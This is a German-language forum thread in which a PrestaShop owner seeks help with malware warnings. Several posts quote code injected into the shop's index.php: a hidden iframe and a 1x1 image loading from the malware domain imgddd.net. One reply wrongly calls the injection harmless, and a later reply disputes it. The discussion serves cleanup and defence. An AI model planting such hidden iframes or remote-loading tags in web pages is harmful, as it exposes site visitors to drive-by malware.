Jump to content
Sign in to follow this  
MellowD666

Virus / Trojanermeldung ?

Recommended Posts

Hallo zusammen,

ich habe mich angemeldet weil mir von unterschiedlichen Quellen berichtet wurde, dass mein noch garnicht gestarteter Presta-Shop einen Virus und/oder Trojaner haben soll?

Ich find nichts und kenn mich damit auch nicht aus - ist hier jemand in der Lage eine Schadensquelle über die Seite rauszufinden oder was kann ich tun? :/

Danke für jede Antwort...

Share this post


Link to post
Share on other sites

installiere mal den googelbrowser chrome der bringt fehlermeldung wenn was nicht stimmt. oder wenn du einen account bei google hast kannst du deinen server nach malware druchsuchen lassen.

wenn du einen provider hast ist das mit dem virus für deine internetseiten nicht relevant.

Share this post


Link to post
Share on other sites

Hallo zusammen,<br/><br/>ich habe mich angemeldet weil mir von unterschiedlichen Quellen berichtet wurde, dass mein noch garnicht gestarteter Presta-Shop einen Virus und/oder Trojaner haben soll? <br/><br/>Ich find nichts und kenn mich damit auch nicht aus - ist hier jemand in der Lage eine Schadensquelle über die Seite rauszufinden oder was kann ich tun? :/<br/><br/>Danke für jede Antwort...

 

Sind die Quellen auch sicher ? Es gibt viele Neider(Konkurrenten) oder auch einfach nur die, die Presta schlecht machen wollen. Davon höre ich sehr viel in den (Entwicklerforen) wo ich verkehre.

Share this post


Link to post
Share on other sites

Danke für den Tip mit Google Chrome. Da kommt folgende Meldung:

 

... enthält Inhalte von imgddd.net, einer Website, die bekanntermaßen Malware enthält. Ihr Computer fängt sich möglicherweise einen Virus ein, wenn Sie diese Website besuchen.

Google hat schädliche Software gefunden, die möglicherweise auf Ihrem Computer installiert wird, wenn Sie fortfahren. Wenn Sie diese Website bereits in der Vergangenheit besucht haben oder dieser Website vertrauen, ist es möglich, dass sie vor Kurzem von einem Hacker manipuliert wurde. Sie sollten daher nicht fortfahren und den Vorgang vielleicht morgen wiederholen oder eine andere Website aufrufen.

 

 

Ich kenne imgddd nicht, ist das in Prestashop irgendwie integriert??

 

Googlebot zeigt folgendes ganz am Ende an:

 

<!-- /MODULE Block various links --></div>

</div>

</body>

</html><iframe style="visibility:hidden;display:none" src="host.php" ></iframe>

<img heigth="1" width="1" border="0" src="http://imgddd.net/t.php?id=16466725">

Share this post


Link to post
Share on other sites

Danke für den Tip mit Google Chrome. Da kommt folgende Meldung:

 

... enthält Inhalte von imgddd.net, einer Website, die bekanntermaßen Malware enthält. Ihr Computer fängt sich möglicherweise einen Virus ein, wenn Sie diese Website besuchen.

Google hat schädliche Software gefunden, die möglicherweise auf Ihrem Computer installiert wird, wenn Sie fortfahren. Wenn Sie diese Website bereits in der Vergangenheit besucht haben oder dieser Website vertrauen, ist es möglich, dass sie vor Kurzem von einem Hacker manipuliert wurde. Sie sollten daher nicht fortfahren und den Vorgang vielleicht morgen wiederholen oder eine andere Website aufrufen.

 

 

Ich kenne imgddd nicht, ist das in Prestashop irgendwie integriert??

 

Googlebot zeigt folgendes ganz am Ende an:

 

<!-- /MODULE Block various links --></div>

</div>

</body>

</html><iframe style="visibility:hidden;display:none" src="host.php" ></iframe>

<img heigth="1" width="1" border="0" src="http://imgddd.net/t.php?id=16466725">

 

Das ist kein Trojaner oder Virus. Das wurde bereits des öfteren im engl. Forum diskutiert. Es weist nur auf eine mögliche Unsicherheit im System vor, weil ein iframe eingebaut wurde. Jedes iFrame kann schadhaften Code ausführen. Du hast in Deinem Varios-Block-Link irgendeinen Link der auf eine externe Seite verweist. Wie heisst deine Seite. Gerne auch per PM, falls du diese nicht Publik machen möchtest.

 

Auch kenne ich dieses Problem nur von alten PrestaVersionen. Welche Version nutzst du ?

Share this post


Link to post
Share on other sites

Nutze Version 1.3.6.0.

 

Habe einen Scan durchgeführt und den Code noch in der index.php entdeckt:

 

?><iframe style="visibility:hidden;display:none" src="host.php" ></iframe>

<img heigth="1" width="1" border="0" src="http://imgddd.net/t.php?id=16466725">

 

Habe diesen Code entfernt, nun blockiert Chrome die Seite nicht mehr. Befürchte aber das es sich möglicherweise wieder iwann selbst neu installiert und irgendwo eine Backdoor-datei drin ist?

 

Zu diesem Problem gibts eine -leider englissprachige- Seite:

 

http://redleg-redleg.blogspot.com/2011/05/cleaning-up-imgaaanet-or-imgbbb-or.html

Share this post


Link to post
Share on other sites

Nutze Version 1.3.6.0.

 

Habe einen Scan durchgeführt und den Code noch in der index.php entdeckt:

 

?><iframe style="visibility:hidden;display:none" src="host.php" ></iframe>

<img heigth="1" width="1" border="0" src="http://imgddd.net/t.php?id=16466725">

 

Habe diesen Code entfernt, nun blockiert Chrome die Seite nicht mehr. Befürchte aber das es sich möglicherweise wieder iwann selbst neu installiert und irgendwo eine Backdoor-datei drin ist?

 

Zu diesem Problem gibts eine -leider englissprachige- Seite:

 

http://redleg-redleg.blogspot.com/2011/05/cleaning-up-imgaaanet-or-imgbbb-or.html

 

Also den Block links mit diesem Link habe ich noch nie gesehen. Von wo hasst du dir die 1.3.6. downgeloadet ? War das wirklich eine Offizielle Prestaversion, also von prestashop.com ?

 

Der Link gehört natürlich rausgelöscht, denn er ist nicht Standard. Bei der Standard 1.3.6. war ein iframe eingebaut, der manche Scanner eben eine mögliche unsichere Quelle angezeigt haben. Das wurde mit der 1.3.7 aber bereinigt. Ich würde sowieso ein Update auf 1.4.3 anstreben. Mit 1.4.X ist wieder ein Quantensprung in Sachen Neuigkeiten, Verbesserungen gekommen. Auch wurde der Code komplett Neu überarbeitet und für weitere Updates fit gemacht. Was spricht dagegen ?

Share this post


Link to post
Share on other sites

Ich habe das Script von der offiziellen Seite runtergeladen und dann durch deutsche und polnische Sprachpakete modifiziert. Etliches musste ich selbst noch übersetzen und kleinigkeiten in den Seiten anpassen.

So ein Update auf 1.4.3. würde natürlich dadurch einiges an Arbeit kosten und vermutlich muss dann wieder vieles angepasst werden...aber ich werd mal einen Ordner anlegen und einen zweiten Shop dann nach und nach einrichten um dann irgendwann auf die neue Version umstellen zu können :)

 

Frage ist nur ob das Sinn macht wenn in Kürze 1.5. kommt?

Share this post


Link to post
Share on other sites

Ich habe das Script von der offiziellen Seite runtergeladen und dann durch deutsche und polnische Sprachpakete modifiziert. Etliches musste ich selbst noch übersetzen und kleinigkeiten in den Seiten anpassen.

So ein Update auf 1.4.3. würde natürlich dadurch einiges an Arbeit kosten und vermutlich muss dann wieder vieles angepasst werden...aber ich werd mal einen Ordner anlegen und einen zweiten Shop dann nach und nach einrichten um dann irgendwann auf die neue Version umstellen zu können :)

 

Frage ist nur ob das Sinn macht wenn in Kürze 1.5. kommt?

 

Sorry, aber der genannte Code ist nicht Original Presta 1.3.6.... Heute Nacht ist offiziell die 1.4.4. rausgekommen. 1.5. kommt frühestens Ende September, wenn überhaupt. Viele User sind gegen eine Presta mit Multishop für alle. Das würde die Handhabung sehr kompliziert machen...

Also vorerst mit 1.4.4. Vorliebe nehmen.

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

×
×
  • Create New...

Important Information

Cookies ensure the smooth running of our services. Using these, you accept the use of cookies. Learn More